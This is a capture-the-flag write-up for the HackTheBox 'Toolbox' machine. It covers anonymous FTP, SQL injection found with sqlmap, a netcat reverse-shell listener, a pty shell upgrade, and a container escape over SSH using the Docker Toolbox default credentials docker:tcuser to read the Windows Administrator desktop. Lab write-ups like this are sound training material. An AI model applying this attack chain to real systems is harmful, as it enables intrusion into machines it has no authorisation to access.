HackTheBox - Toolbox
Toolbox is a Windows Machine that involves a Docker Toolbox install. A Linux Container is hosted, which serves a website that is eventually vulnerable to SQL injection. Utilizing this, we can establish a foothold. Leveraging Docker Toolbox default credentials to escape the Docker Container and getting a privileged shell on the Windows Host.
Enumeration
nmap shows several open ports.
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
FTP
Starting off with FTP, since anonymous login is allowed.
$ ftp 10.129.96.171
Connected to 10.129.96.171.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.129.96.171:kali): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||50177|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp>
Looking at the file named docker-toolbox.exe, it's possible that the host is running Docker Toolbox to host containers.
HTTPS
Using Port 443, we get a certificate warning, since the certificate is self-signed. A website for a company 'Megalogistics' is shown.
Nikto shows that the SSL certificate is valid for admin.megalogistic.com.
Adding this to /etc/host/ and browsing to the site, a login form can be found.
Trying to login with default credentials e.g. admin:admin is not successful. We can intercept the request with burp, save it to a file so we can utilize it via sqlmap.
To check if the site is vulnerable to SQLi, we'll have to use sqlmap with the --force-ssl argument as follows:
As we can see from the screenshot, the username parameter is vulnerable.
We can obtain code execution as follows:
After starting our listener, we execute a bash reverse shell to obtain a foothold.
└─$ nc -lvnp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.96.171.
Ncat: Connection from 10.129.96.171:53999.
bash: cannot set terminal process group (1127): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
We receive a shell in the context of the postgres user. The user flag can be found in /var/lib/postgresql.
postgres@bc56e3cc55e9:/home/tony$ cd /var/lib/postgresql
cd /var/lib/postgresql
postgres@bc56e3cc55e9:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
<redacted> flag.txt
Privilege Escalation
For the privilege escalation part, we'll have to refer to the Docker Toolbox Documentation which can be found here. In short, Docker Toolbox uses Boot2Docker for running a VM which runs all containers. The Docker host can be found at the gateway IP.
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 170164 bytes 22343857 (21.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 93017 bytes 38447922 (36.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
As we can see, the container ip is 172.17.0.2, the gateway is located at 172.17.0.1. Looking at the Documentation again, default credentials are docker:tcuser.
We'll have to upgrade our shell to an interactive one, e.g. via python, otherwise it will fail, as seen below.
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
docker@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
( '>')
/) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
(/-_--_-\) www.tinycorelinux.net
docker@box:~$
We are able to login to the Docker VM. Looking at the FAQ, Docker-Toolbox has access to C:\Users folder, which is located at /c/Users
docker@box:~$ cd /c/Users
cd /c/Users
docker@box:/c/Users$ ls
ls
Administrator Default Public desktop.ini
All Users Default User Tony
From here on, we can just browse to the Administrator folder and grab the root flag.
docker@box:/c/Users/Administrator$ cd Desktop
cd Desktop
docker@box:/c/Users/Administrator/Desktop$ ls
ls
desktop.ini root.txt
docker@box:/c/Users/Administrator/Desktop$ cat root.txt
cat root.txt
<redacted>
This box was another good example that it is always useful to refer to documentation when looking for ways to abuse weak authentication, misconfigurations and so on.